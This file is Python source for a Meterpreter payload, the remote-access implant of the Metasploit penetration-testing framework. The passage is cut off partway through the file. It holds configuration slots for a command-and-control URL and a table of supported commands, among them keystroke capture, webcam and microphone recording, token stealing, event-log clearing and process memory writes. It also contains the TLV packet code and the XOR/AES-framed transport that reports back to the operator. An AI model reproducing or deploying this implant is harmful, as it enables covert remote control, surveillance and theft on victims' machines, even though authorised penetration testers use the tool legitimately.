#!/usr/bin/python import binascii import code import os import platform import random import re import select import socket import struct import subprocess import sys import threading import time import traceback try: import ctypes except ImportError: has_windll = False else: has_windll = hasattr(ctypes, 'windll') try: urllib_imports = ['ProxyBasicAuthHandler', 'ProxyHandler', 'HTTPSHandler', 'Request', 'build_opener', 'install_opener', 'urlopen'] if sys.version_info[0] < 3: urllib = __import__('urllib2', fromlist=urllib_imports) else: urllib = __import__('urllib.request', fromlist=urllib_imports) except ImportError: has_urllib = False else: has_urllib = True if sys.version_info[0] < 3: is_str = lambda obj: issubclass(obj.__class__, str) is_bytes = lambda obj: issubclass(obj.__class__, str) bytes = lambda *args: str(*args[:1]) NULL_BYTE = '\x00' unicode = lambda x: (x.decode('UTF-8') if isinstance(x, str) else x) else: if isinstance(__builtins__, dict): is_str = lambda obj: issubclass(obj.__class__, __builtins__['str']) str = lambda x: __builtins__['str'](x, *(() if isinstance(x, (float, int)) else ('UTF-8',))) else: is_str = lambda obj: issubclass(obj.__class__, __builtins__.str) str = lambda x: __builtins__.str(x, *(() if isinstance(x, (float, int)) else ('UTF-8',))) is_bytes = lambda obj: issubclass(obj.__class__, bytes) NULL_BYTE = bytes('\x00', 'UTF-8') long = int unicode = lambda x: (x.decode('UTF-8') if isinstance(x, bytes) else x) # reseed the random generator. random.seed() # # Constants # # these values will be patched, DO NOT CHANGE THEM DEBUGGING = False DEBUGGING_LOG_FILE_PATH = None TRY_TO_FORK = True HTTP_CONNECTION_URL = None HTTP_PROXY = None HTTP_USER_AGENT = None HTTP_COOKIE = None HTTP_HOST = None HTTP_REFERER = None PAYLOAD_UUID = '' SESSION_GUID = '' SESSION_COMMUNICATION_TIMEOUT = 300 SESSION_EXPIRATION_TIMEOUT = 604800 SESSION_RETRY_TOTAL = 3600 SESSION_RETRY_WAIT = 10 PACKET_TYPE_REQUEST = 0 PACKET_TYPE_RESPONSE = 1 PACKET_TYPE_PLAIN_REQUEST = 10 PACKET_TYPE_PLAIN_RESPONSE = 11 ERROR_SUCCESS = 0 # not defined in original C implementation ERROR_FAILURE = 1 ERROR_FAILURE_PYTHON = 2 ERROR_FAILURE_WINDOWS = 3 CHANNEL_CLASS_BUFFERED = 0 CHANNEL_CLASS_STREAM = 1 CHANNEL_CLASS_DATAGRAM = 2 CHANNEL_CLASS_POOL = 3 # # TLV Meta Types # TLV_META_TYPE_NONE = ( 0 ) TLV_META_TYPE_STRING = (1 << 16) TLV_META_TYPE_UINT = (1 << 17) TLV_META_TYPE_RAW = (1 << 18) TLV_META_TYPE_BOOL = (1 << 19) TLV_META_TYPE_QWORD = (1 << 20) TLV_META_TYPE_COMPRESSED = (1 << 29) TLV_META_TYPE_GROUP = (1 << 30) TLV_META_TYPE_COMPLEX = (1 << 31) # not defined in original TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16) # # TLV base starting points # TLV_RESERVED = 0 TLV_EXTENSIONS = 20000 TLV_USER = 40000 TLV_TEMP = 60000 # # TLV Specific Types # TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0 TLV_TYPE_COMMAND_ID = TLV_META_TYPE_UINT | 1 TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2 TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3 TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4 TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10 TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11 TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12 TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25 TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26 TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27 TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50 TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51 TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52 TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53 TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54 TLV_TYPE_CHANNEL_PARENTID = TLV_META_TYPE_UINT | 55 TLV_TYPE_SEEK_WHENCE = TLV_META_TYPE_UINT | 70 TLV_TYPE_SEEK_OFFSET = TLV_META_TYPE_UINT | 71 TLV_TYPE_SEEK_POS = TLV_META_TYPE_UINT | 72 TLV_TYPE_EXCEPTION_CODE = TLV_META_TYPE_UINT | 300 TLV_TYPE_EXCEPTION_STRING = TLV_META_TYPE_STRING | 301 TLV_TYPE_LIBRARY_PATH = TLV_META_TYPE_STRING | 400 TLV_TYPE_TARGET_PATH = TLV_META_TYPE_STRING | 401 TLV_TYPE_TRANS_TYPE = TLV_META_TYPE_UINT | 430 TLV_TYPE_TRANS_URL = TLV_META_TYPE_STRING | 431 TLV_TYPE_TRANS_UA = TLV_META_TYPE_STRING | 432 TLV_TYPE_TRANS_COMM_TIMEOUT = TLV_META_TYPE_UINT | 433 TLV_TYPE_TRANS_SESSION_EXP = TLV_META_TYPE_UINT | 434 TLV_TYPE_TRANS_CERT_HASH = TLV_META_TYPE_RAW | 435 TLV_TYPE_TRANS_PROXY_HOST = TLV_META_TYPE_STRING | 436 TLV_TYPE_TRANS_PROXY_USER = TLV_META_TYPE_STRING | 437 TLV_TYPE_TRANS_PROXY_PASS = TLV_META_TYPE_STRING | 438 TLV_TYPE_TRANS_RETRY_TOTAL = TLV_META_TYPE_UINT | 439 TLV_TYPE_TRANS_RETRY_WAIT = TLV_META_TYPE_UINT | 440 TLV_TYPE_TRANS_HEADERS = TLV_META_TYPE_STRING | 441 TLV_TYPE_TRANS_GROUP = TLV_META_TYPE_GROUP | 442 TLV_TYPE_MACHINE_ID = TLV_META_TYPE_STRING | 460 TLV_TYPE_UUID = TLV_META_TYPE_RAW | 461 TLV_TYPE_SESSION_GUID = TLV_META_TYPE_RAW | 462 TLV_TYPE_RSA_PUB_KEY = TLV_META_TYPE_RAW | 550 TLV_TYPE_SYM_KEY_TYPE = TLV_META_TYPE_UINT | 551 TLV_TYPE_SYM_KEY = TLV_META_TYPE_RAW | 552 TLV_TYPE_ENC_SYM_KEY = TLV_META_TYPE_RAW | 553 TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500 TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501 TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502 TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503 EXPORTED_SYMBOLS = {} EXPORTED_SYMBOLS['DEBUGGING'] = DEBUGGING ENC_NONE = 0 ENC_AES256 = 1 # Packet header sizes PACKET_XOR_KEY_SIZE = 4 PACKET_SESSION_GUID_SIZE = 16 PACKET_ENCRYPT_FLAG_SIZE = 4 PACKET_LENGTH_SIZE = 4 PACKET_TYPE_SIZE = 4 PACKET_LENGTH_OFF = (PACKET_XOR_KEY_SIZE + PACKET_SESSION_GUID_SIZE + PACKET_ENCRYPT_FLAG_SIZE) PACKET_HEADER_SIZE = (PACKET_XOR_KEY_SIZE + PACKET_SESSION_GUID_SIZE + PACKET_ENCRYPT_FLAG_SIZE + PACKET_LENGTH_SIZE + PACKET_TYPE_SIZE) # --------------------------------------------------------------- # --- THIS CONTENT WAS GENERATED BY A TOOL @ 2020-05-01 05:29:59 UTC EXTENSION_ID_CORE = 0 EXTENSION_ID_STDAPI = 1000 COMMAND_IDS = ( (1, 'core_channel_close'), (2, 'core_channel_eof'), (3, 'core_channel_interact'), (4, 'core_channel_open'), (5, 'core_channel_read'), (6, 'core_channel_seek'), (7, 'core_channel_tell'), (8, 'core_channel_write'), (9, 'core_console_write'), (10, 'core_enumextcmd'), (11, 'core_get_session_guid'), (12, 'core_loadlib'), (13, 'core_machine_id'), (14, 'core_migrate'), (15, 'core_native_arch'), (16, 'core_negotiate_tlv_encryption'), (17, 'core_patch_url'), (18, 'core_pivot_add'), (19, 'core_pivot_remove'), (20, 'core_pivot_session_died'), (21, 'core_set_session_guid'), (22, 'core_set_uuid'), (23, 'core_shutdown'), (24, 'core_transport_add'), (25, 'core_transport_change'), (26, 'core_transport_getcerthash'), (27, 'core_transport_list'), (28, 'core_transport_next'), (29, 'core_transport_prev'), (30, 'core_transport_remove'), (31, 'core_transport_setcerthash'), (32, 'core_transport_set_timeouts'), (33, 'core_transport_sleep'), (1001, 'stdapi_fs_chdir'), (1002, 'stdapi_fs_chmod'), (1003, 'stdapi_fs_delete_dir'), (1004, 'stdapi_fs_delete_file'), (1005, 'stdapi_fs_file_copy'), (1006, 'stdapi_fs_file_expand_path'), (1007, 'stdapi_fs_file_move'), (1008, 'stdapi_fs_getwd'), (1009, 'stdapi_fs_ls'), (1010, 'stdapi_fs_md5'), (1011, 'stdapi_fs_mkdir'), (1012, 'stdapi_fs_mount_show'), (1013, 'stdapi_fs_search'), (1014, 'stdapi_fs_separator'), (1015, 'stdapi_fs_sha1'), (1016, 'stdapi_fs_stat'), (1017, 'stdapi_net_config_add_route'), (1018, 'stdapi_net_config_get_arp_table'), (1019, 'stdapi_net_config_get_interfaces'), (1020, 'stdapi_net_config_get_netstat'), (1021, 'stdapi_net_config_get_proxy'), (1022, 'stdapi_net_config_get_routes'), (1023, 'stdapi_net_config_remove_route'), (1024, 'stdapi_net_resolve_host'), (1025, 'stdapi_net_resolve_hosts'), (1026, 'stdapi_net_socket_tcp_shutdown'), (1027, 'stdapi_net_tcp_channel_open'), (1028, 'stdapi_railgun_api'), (1029, 'stdapi_railgun_api_multi'), (1030, 'stdapi_railgun_memread'), (1031, 'stdapi_railgun_memwrite'), (1032, 'stdapi_registry_check_key_exists'), (1033, 'stdapi_registry_close_key'), (1034, 'stdapi_registry_create_key'), (1035, 'stdapi_registry_delete_key'), (1036, 'stdapi_registry_delete_value'), (1037, 'stdapi_registry_enum_key'), (1038, 'stdapi_registry_enum_key_direct'), (1039, 'stdapi_registry_enum_value'), (1040, 'stdapi_registry_enum_value_direct'), (1041, 'stdapi_registry_load_key'), (1042, 'stdapi_registry_open_key'), (1043, 'stdapi_registry_open_remote_key'), (1044, 'stdapi_registry_query_class'), (1045, 'stdapi_registry_query_value'), (1046, 'stdapi_registry_query_value_direct'), (1047, 'stdapi_registry_set_value'), (1048, 'stdapi_registry_set_value_direct'), (1049, 'stdapi_registry_unload_key'), (1050, 'stdapi_sys_config_driver_list'), (1051, 'stdapi_sys_config_drop_token'), (1052, 'stdapi_sys_config_getenv'), (1053, 'stdapi_sys_config_getprivs'), (1054, 'stdapi_sys_config_getsid'), (1055, 'stdapi_sys_config_getuid'), (1056, 'stdapi_sys_config_localtime'), (1057, 'stdapi_sys_config_rev2self'), (1058, 'stdapi_sys_config_steal_token'), (1059, 'stdapi_sys_config_sysinfo'), (1060, 'stdapi_sys_eventlog_clear'), (1061, 'stdapi_sys_eventlog_close'), (1062, 'stdapi_sys_eventlog_numrecords'), (1063, 'stdapi_sys_eventlog_oldest'), (1064, 'stdapi_sys_eventlog_open'), (1065, 'stdapi_sys_eventlog_read'), (1066, 'stdapi_sys_power_exitwindows'), (1067, 'stdapi_sys_process_attach'), (1068, 'stdapi_sys_process_close'), (1069, 'stdapi_sys_process_execute'), (1070, 'stdapi_sys_process_get_info'), (1071, 'stdapi_sys_process_get_processes'), (1072, 'stdapi_sys_process_getpid'), (1073, 'stdapi_sys_process_image_get_images'), (1074, 'stdapi_sys_process_image_get_proc_address'), (1075, 'stdapi_sys_process_image_load'), (1076, 'stdapi_sys_process_image_unload'), (1077, 'stdapi_sys_process_kill'), (1078, 'stdapi_sys_process_memory_allocate'), (1079, 'stdapi_sys_process_memory_free'), (1080, 'stdapi_sys_process_memory_lock'), (1081, 'stdapi_sys_process_memory_protect'), (1082, 'stdapi_sys_process_memory_query'), (1083, 'stdapi_sys_process_memory_read'), (1084, 'stdapi_sys_process_memory_unlock'), (1085, 'stdapi_sys_process_memory_write'), (1086, 'stdapi_sys_process_thread_close'), (1087, 'stdapi_sys_process_thread_create'), (1088, 'stdapi_sys_process_thread_get_threads'), (1089, 'stdapi_sys_process_thread_open'), (1090, 'stdapi_sys_process_thread_query_regs'), (1091, 'stdapi_sys_process_thread_resume'), (1092, 'stdapi_sys_process_thread_set_regs'), (1093, 'stdapi_sys_process_thread_suspend'), (1094, 'stdapi_sys_process_thread_terminate'), (1095, 'stdapi_sys_process_wait'), (1096, 'stdapi_ui_desktop_enum'), (1097, 'stdapi_ui_desktop_get'), (1098, 'stdapi_ui_desktop_screenshot'), (1099, 'stdapi_ui_desktop_set'), (1100, 'stdapi_ui_enable_keyboard'), (1101, 'stdapi_ui_enable_mouse'), (1102, 'stdapi_ui_get_idle_time'), (1103, 'stdapi_ui_get_keys_utf8'), (1104, 'stdapi_ui_send_keyevent'), (1105, 'stdapi_ui_send_keys'), (1106, 'stdapi_ui_send_mouse'), (1107, 'stdapi_ui_start_keyscan'), (1108, 'stdapi_ui_stop_keyscan'), (1109, 'stdapi_ui_unlock_desktop'), (1110, 'stdapi_webcam_audio_record'), (1111, 'stdapi_webcam_get_frame'), (1112, 'stdapi_webcam_list'), (1113, 'stdapi_webcam_start'), (1114, 'stdapi_webcam_stop'), (1115, 'stdapi_audio_mic_start'), (1116, 'stdapi_audio_mic_stop'), (1117, 'stdapi_audio_mic_list'), (1118, 'stdapi_sys_process_set_term_size'), ) # --------------------------------------------------------------- if DEBUGGING: import logging logging.basicConfig(level=logging.DEBUG) if DEBUGGING_LOG_FILE_PATH: file_handler = logging.FileHandler(DEBUGGING_LOG_FILE_PATH) file_handler.setLevel(logging.DEBUG) logging.getLogger().addHandler(file_handler) if has_windll: class SYSTEM_INFO(ctypes.Structure): _fields_ = [("wProcessorArchitecture", ctypes.c_uint16), ("wReserved", ctypes.c_uint16), ("dwPageSize", ctypes.c_uint32), ("lpMinimumApplicationAddress", ctypes.c_void_p), ("lpMaximumApplicationAddress", ctypes.c_void_p), ("dwActiveProcessorMask", ctypes.c_uint32), ("dwNumberOfProcessors", ctypes.c_uint32), ("dwProcessorType", ctypes.c_uint32), ("dwAllocationGranularity", ctypes.c_uint32), ("wProcessorLevel", ctypes.c_uint16), ("wProcessorRevision", ctypes.c_uint16)] def rand_bytes(n): return os.urandom(n) def rand_xor_key(): return tuple(random.randint(1, 255) for _ in range(4)) def xor_bytes(key, data): if sys.version_info[0] < 3: dexored = ''.join(chr(ord(data[i]) ^ key[i % len(key)]) for i in range(len(data))) else: dexored = bytes(data[i] ^ key[i % len(key)] for i in range(len(data))) return dexored def export(symbol): EXPORTED_SYMBOLS[symbol.__name__] = symbol return symbol def generate_request_id(): chars = 'abcdefghijklmnopqrstuvwxyz' return ''.join(random.choice(chars) for x in range(32)) @export def cmd_id_to_string(this_id): for that_id, that_string in COMMAND_IDS: if this_id == that_id: return that_string debug_print('[*] failed to lookup string for command id: ' + str(this_id)) return None @export def cmd_string_to_id(this_string): for that_id, that_string in COMMAND_IDS: if this_string == that_string: return that_id debug_print('[*] failed to lookup id for command string: ' + this_string) return None @export def crc16(data): poly = 0x1021 reg = 0x0000 if is_str(data): data = list(map(ord, data)) elif is_bytes(data): data = list(data) data.append(0) data.append(0) for byte in data: mask = 0x80 while mask > 0: reg <<= 1 if byte & mask: reg += 1 mask >>= 1 if reg > 0xffff: reg &= 0xffff reg ^= poly return reg @export def debug_print(msg): if DEBUGGING: logging.debug(msg) @export def debug_traceback(msg=None): if DEBUGGING: if msg: debug_print(msg) debug_print(traceback.format_exc()) @export def error_result(exception=None): if not exception: _, exception, _ = sys.exc_info() exception_crc = crc16(exception.__class__.__name__) if exception_crc == 0x4cb2: # WindowsError return error_result_windows(exception.errno) else: result = ((exception_crc << 16) | ERROR_FAILURE_PYTHON) return result @export def error_result_windows(error_number=None): if not has_windll: return ERROR_FAILURE if error_number == None: error_number = ctypes.windll.kernel32.GetLastError() if error_number > 0xffff: return ERROR_FAILURE result = ((error_number << 16) | ERROR_FAILURE_WINDOWS) return result @export def get_hdd_label(): for _, _, files in os.walk('/dev/disk/by-id/'): for f in files: for p in ['ata-', 'mb-']: if f[:len(p)] == p: return f[len(p):] return '' @export def get_native_arch(): arch = get_system_arch() if arch == 'x64' and ctypes.sizeof(ctypes.c_void_p) == 4: arch = 'x86' return arch @export def get_system_arch(): uname_info = platform.uname() arch = uname_info[4] if has_windll: sysinfo = SYSTEM_INFO() ctypes.windll.kernel32.GetNativeSystemInfo(ctypes.byref(sysinfo)) values = {0:'x86', 5:'armle', 6:'IA64', 9:'x64'} arch = values.get(sysinfo.wProcessorArchitecture, uname_info[4]) if arch == 'x86_64' or arch.lower() == 'amd64': arch = 'x64' return arch @export def inet_pton(family, address): if family == socket.AF_INET6 and '%' in address: address = address.split('%', 1)[0] if hasattr(socket, 'inet_pton'): return socket.inet_pton(family, address) elif has_windll: WSAStringToAddress = ctypes.windll.ws2_32.WSAStringToAddressA lpAddress = (ctypes.c_ubyte * 28)() lpAddressLength = ctypes.c_int(ctypes.sizeof(lpAddress)) if WSAStringToAddress(address, family, None, ctypes.byref(lpAddress), ctypes.byref(lpAddressLength)) != 0: raise Exception('WSAStringToAddress failed') if family == socket.AF_INET: return ''.join(map(chr, lpAddress[4:8])) elif family == socket.AF_INET6: return ''.join(map(chr, lpAddress[8:24])) raise Exception('no suitable inet_pton functionality is available') @export def packet_enum_tlvs(pkt, tlv_type=None): offset = 0 while offset < len(pkt): tlv = struct.unpack('>II', pkt[offset:offset + 8]) if tlv_type is None or (tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type: val = pkt[offset + 8:(offset + 8 + (tlv[0] - 8))] if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING: val = str(val.split(NULL_BYTE, 1)[0]) elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT: val = struct.unpack('>I', val)[0] elif (tlv[1] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD: val = struct.unpack('>Q', val)[0] elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL: val = bool(struct.unpack('b', val)[0]) elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW: pass yield {'type': tlv[1], 'length': tlv[0], 'value': val} offset += tlv[0] return @export def packet_get_tlv(pkt, tlv_type): try: tlv = list(packet_enum_tlvs(pkt, tlv_type))[0] except IndexError: return {} return tlv @export def tlv_pack(*args): if len(args) == 2: tlv = {'type':args[0], 'value':args[1]} else: tlv = args[0] data = '' value = tlv['value'] if (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT: if isinstance(value, float): value = int(round(value)) data = struct.pack('>III', 12, tlv['type'], value) elif (tlv['type'] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD: data = struct.pack('>IIQ', 16, tlv['type'], value) elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL: data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(value))), 'UTF-8') else: if sys.version_info[0] < 3 and value.__class__.__name__ == 'unicode': value = value.encode('UTF-8') elif not is_bytes(value): value = bytes(value, 'UTF-8') if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING: data = struct.pack('>II', 8 + len(value) + 1, tlv['type']) + value + NULL_BYTE elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW: data = struct.pack('>II', 8 + len(value), tlv['type']) + value elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP: data = struct.pack('>II', 8 + len(value), tlv['type']) + value elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX: data = struct.pack('>II', 8 + len(value), tlv['type']) + value return data @export def tlv_pack_request(method, parts=None): pkt = struct.pack('>I', PACKET_TYPE_REQUEST) pkt += tlv_pack(TLV_TYPE_COMMAND_ID, cmd_string_to_id(method)) pkt += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(bytes(PAYLOAD_UUID, 'UTF-8'))) pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id()) parts = parts or [] for part in parts: pkt += tlv_pack(part['type'], part['value']) return pkt #@export class MeterpreterChannel(object): def core_close(self, request, response): self.close() return ERROR_SUCCESS, response def core_eof(self, request, response): response += tlv_pack(TLV_TYPE_BOOL, self.eof()) return ERROR_SUCCESS, response def core_read(self, request, response): length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value'] response += tlv_pack(TLV_TYPE_CHANNEL_DATA, self.read(length)) return ERROR_SUCCESS, response def core_write(self, request, response): channel_data = packet_get_tlv(request, TLV_TYPE_CHANNEL_DATA)['value'] response += tlv_pack(TLV_TYPE_LENGTH, self.write(channel_data)) return ERROR_SUCCESS, response def core_seek(self, request, response): offset = packet_get_tlv(request, TLV_TYPE_SEEK_OFFSET)['value'] whence = packet_get_tlv(request, TLV_TYPE_SEEK_WHENCE)['value'] self.seek(offset, whence) return ERROR_SUCCESS, response def core_tell(self, request, response): response += tlv_pack(TLV_TYPE_SEEK_POS, self.tell()) return ERROR_SUCCESS, response def close(self): raise NotImplementedError() def eof(self): return False def is_alive(self): return True def notify(self): return None def read(self, length): raise NotImplementedError() def write(self, data): raise NotImplementedError() def seek(self, offset, whence=os.SEEK_SET): raise NotImplementedError() def tell(self): raise NotImplementedError() #@export class MeterpreterFile(MeterpreterChannel): def __init__(self, file_obj): self.file_obj = file_obj super(MeterpreterFile, self).__init__() def close(self): self.file_obj.close() def eof(self): return self.file_obj.tell() >= os.fstat(self.file_obj.fileno()).st_size def read(self, length): return self.file_obj.read(length) def write(self, data): self.file_obj.write(data) return len(data) def seek(self, offset, whence=os.SEEK_SET): self.file_obj.seek(offset, whence) def tell(self): return self.file_obj.tell() export(MeterpreterFile) #@export class MeterpreterProcess(MeterpreterChannel): def __init__(self, proc_h): self.proc_h = proc_h super(MeterpreterProcess, self).__init__() def close(self): if self.proc_h.poll() is None: self.proc_h.kill() if self.proc_h.ptyfd is not None: os.close(self.proc_h.ptyfd) self.proc_h.ptyfd = None for stream in (self.proc_h.stdin, self.proc_h.stdout, self.proc_h.stderr): if not hasattr(stream, 'close'): continue try: stream.close() except (IOError, OSError): pass def is_alive(self): return self.proc_h.is_alive() def read(self, length): data = bytes() stderr_reader = self.proc_h.stderr_reader stdout_reader = self.proc_h.stdout_reader if stderr_reader.is_read_ready() and length > 0: data += stderr_reader.read(length) if stdout_reader.is_read_ready() and (length - len(data)) > 0: data += stdout_reader.read(length - len(data)) return data def write(self, data): self.proc_h.write(data) return len(data) export(MeterpreterProcess) #@export class MeterpreterSocket(MeterpreterChannel): def __init__(self, sock): self.sock = sock self._is_alive = True super(MeterpreterSocket, self).__init__() def core_write(self, request, response): try: status, response = super(MeterpreterSocket, self).core_write(request, response) except socket.error: self.close() self._is_alive = False status = ERROR_FAILURE return status, response def close(self): return self.sock.close() def fileno(self): return self.sock.fileno() def is_alive(self): return self._is_alive def read(self, length): return self.sock.recv(length) def write(self, data): return self.sock.send(data) export(MeterpreterSocket) #@export class MeterpreterSocketTCPClient(MeterpreterSocket): pass export(MeterpreterSocketTCPClient) #@export class MeterpreterSocketTCPServer(MeterpreterSocket): pass export(MeterpreterSocketTCPServer) #@export class MeterpreterSocketUDPClient(MeterpreterSocket): def __init__(self, sock, peer_address=None): super(MeterpreterSocketUDPClient, self).__init__(sock) self.peer_address = peer_address def core_write(self, request, response): peer_host = packet_get_tlv(request, TLV_TYPE_PEER_HOST).get('value') peer_port = packet_get_tlv(request, TLV_TYPE_PEER_PORT).get('value') if peer_host and peer_port: peer_address = (peer_host, peer_port) elif self.peer_address: peer_address = self.peer_address else: raise RuntimeError('peer_host and peer_port must be specified with an unbound/unconnected UDP channel') channel_data = packet_get_tlv(request, TLV_TYPE_CHANNEL_DATA)['value'] try: length = self.sock.sendto(channel_data, peer_address) except socket.error: self.close() self._is_alive = False status = ERROR_FAILURE else: response += tlv_pack(TLV_TYPE_LENGTH, length) status = ERROR_SUCCESS return status, response def read(self, length): return self.sock.recvfrom(length)[0] def write(self, data): self.sock.sendto(data, self.peer_address) export(MeterpreterSocketUDPClient) class STDProcessBuffer(threading.Thread): def __init__(self, std, is_alive, name=None): threading.Thread.__init__(self, name=name or self.__class__.__name__) self.std = std self.is_alive = is_alive self.data = bytes() self.data_lock = threading.RLock() self._is_reading = True def _read1(self): try: return self.std.read(1) except (IOError, OSError): return bytes() def run(self): try: byte = self._read1() while len(byte) > 0: self.data_lock.acquire() self.data += byte self.data_lock.release() byte = self._read1() finally: self._is_reading = False def is_reading(self): return self._is_reading or self.is_read_ready() def is_read_ready(self): return len(self.data) != 0 def peek(self, l = None): data = bytes() self.data_lock.acquire() if l == None: data = self.data else: data = self.data[0:l] self.data_lock.release() return data def read(self, l = None): self.data_lock.acquire() data = self.peek(l) self.data = self.data[len(data):] self.data_lock.release() return data #@export class STDProcess(subprocess.Popen): def __init__(self, *args, **kwargs): debug_print('[*] starting process: ' + repr(args[0])) subprocess.Popen.__init__(self, *args, **kwargs) self.echo_protection = False self.ptyfd = None def is_alive(self): is_proc_alive = self.poll() is None is_stderr_reading = self.stderr_reader.is_reading() is_stdout_reading = self.stdout_reader.is_reading() return is_proc_alive or is_stderr_reading or is_stdout_reading def start(self): self.stdout_reader = STDProcessBuffer(self.stdout, self.is_alive, name='STDProcessBuffer.stdout') self.stdout_reader.start() self.stderr_reader = STDProcessBuffer(self.stderr, self.is_alive, name='STDProcessBuffer.stderr') self.stderr_reader.start() def write(self, channel_data): length = self.stdin.write(channel_data) self.stdin.flush() if self.echo_protection: end_time = time.time() + 0.5 out_data = bytes() while (time.time() < end_time) and (out_data != channel_data): if self.stdout_reader.is_read_ready(): out_data = self.stdout_reader.peek(len(channel_data)) if out_data == channel_data: self.stdout_reader.read(len(channel_data)) return length export(STDProcess) class Transport(object): def __init__(self): self.communication_timeout = SESSION_COMMUNICATION_TIMEOUT self.communication_last = 0 self.retry_total = SESSION_RETRY_TOTAL self.retry_wait = SESSION_RETRY_WAIT self.request_retire = False self.aes_enabled = False self.aes_key = None def __repr__(self): return "<{0} url='{1}' >".format(self.__class__.__name__, self.url) @property def communication_has_expired(self): return self.communication_last + self.communication_timeout < time.time() @property def should_retire(self): return self.communication_has_expired or self.request_retire @staticmethod def from_request(request): url = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value'] if url.startswith('tcp'): transport = TcpTransport(url) elif url.startswith('http'): proxy = packet_get_tlv(request, TLV_TYPE_TRANS_PROXY_HOST).get('value') user_agent = packet_get_tlv(request, TLV_TYPE_TRANS_UA).get('value', HTTP_USER_AGENT) http_headers = packet_get_tlv(request, TLV_TYPE_TRANS_HEADERS).get('value', None) transport = HttpTransport(url, proxy=proxy, user_agent=user_agent) if http_headers: headers = {} for h in http_headers.strip().split("\r\n"): p = h.split(':') headers[p[0].upper()] = ''.join(p[1:0]) http_host = headers.get('HOST') http_cookie = headers.get('COOKIE') http_referer = headers.get('REFERER') transport = HttpTransport(url, proxy=proxy, user_agent=user_agent, http_host=http_host, http_cookie=http_cookie, http_referer=http_referer) transport.communication_timeout = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT).get('value', SESSION_COMMUNICATION_TIMEOUT) transport.retry_total = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_TOTAL).get('value', SESSION_RETRY_TOTAL) transport.retry_wait = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_WAIT).get('value', SESSION_RETRY_WAIT) return transport def _activate(self): return True def activate(self): self.aes_key = None self.aes_enabled = False end_time = time.time() + self.retry_total while time.time() < end_time: try: activate_succeeded = self._activate() except: activate_succeeded = False if activate_succeeded: self.communication_last = time.time() return True time.sleep(self.retry_wait) return False def _deactivate(self): return def deactivate(self): try: self._deactivate() except: pass self.communication_last = 0 return True def decrypt_packet(self, pkt): if pkt and len(pkt) > PACKET_HEADER_SIZE: xor_key = struct.unpack('BBBB', pkt[:PACKET_XOR_KEY_SIZE]) raw = xor_bytes(xor_key, pkt) enc_offset = PACKET_XOR_KEY_SIZE + PACKET_SESSION_GUID_SIZE enc_flag = struct.unpack('>I', raw[enc_offset:enc_offset+PACKET_ENCRYPT_FLAG_SIZE])[0] if enc_flag == ENC_AES256: iv = raw[PACKET_HEADER_SIZE:PACKET_HEADER_SIZE+16] encrypted = raw[PACKET_HEADER_SIZE+len(iv):] return met_aes_decrypt(self.aes_key, iv, encrypted) else: return raw[PACKET_HEADER_SIZE:] return None def get_packet(self): self.request_retire = False try: pkt = self.decrypt_packet(self._get_packet()) except: debug_traceback() return None if pkt is None: return None self.communication_last = time.time() return pkt def encrypt_packet(self, pkt): # The packet now has to contain session GUID and encryption flag info # And given that we're not yet supporting AES, we're going to just # always return the session guid and the encryption flag set to 0 enc_type = ENC_NONE if self.aes_key: # The encryption key is present, but we should only used the key # when it is enabled. If we use it before it's enabled, then we # end up encrypting the packet that contains the key before # sending it back to MSF, and it won't be able to decrypt it yet. if self.aes_enabled: iv = rand_bytes(16) enc = iv + met_aes_encrypt(self.aes_key, iv, pkt[8:]) hdr = struct.pack('>I', len(enc) + 8) + pkt[4:8] pkt = hdr + enc # We change the packet encryption type to tell MSF that # the packet is encrypted. enc_type = ENC_AES256 else: # If we get here, it means that the AES encryption key # is ready to use from this point onwards as the last # plain text packet has been sent back to MSF containing # the key, and so MSF will be able to handle encrypted # communications from here. self.aes_enabled = True xor_key = rand_xor_key() raw = binascii.a2b_hex(bytes(SESSION_GUID, 'UTF-8')) + struct.pack('>I', enc_type) + pkt result = struct.pack('BBBB', *xor_key) + xor_bytes(xor_key, raw) return result def 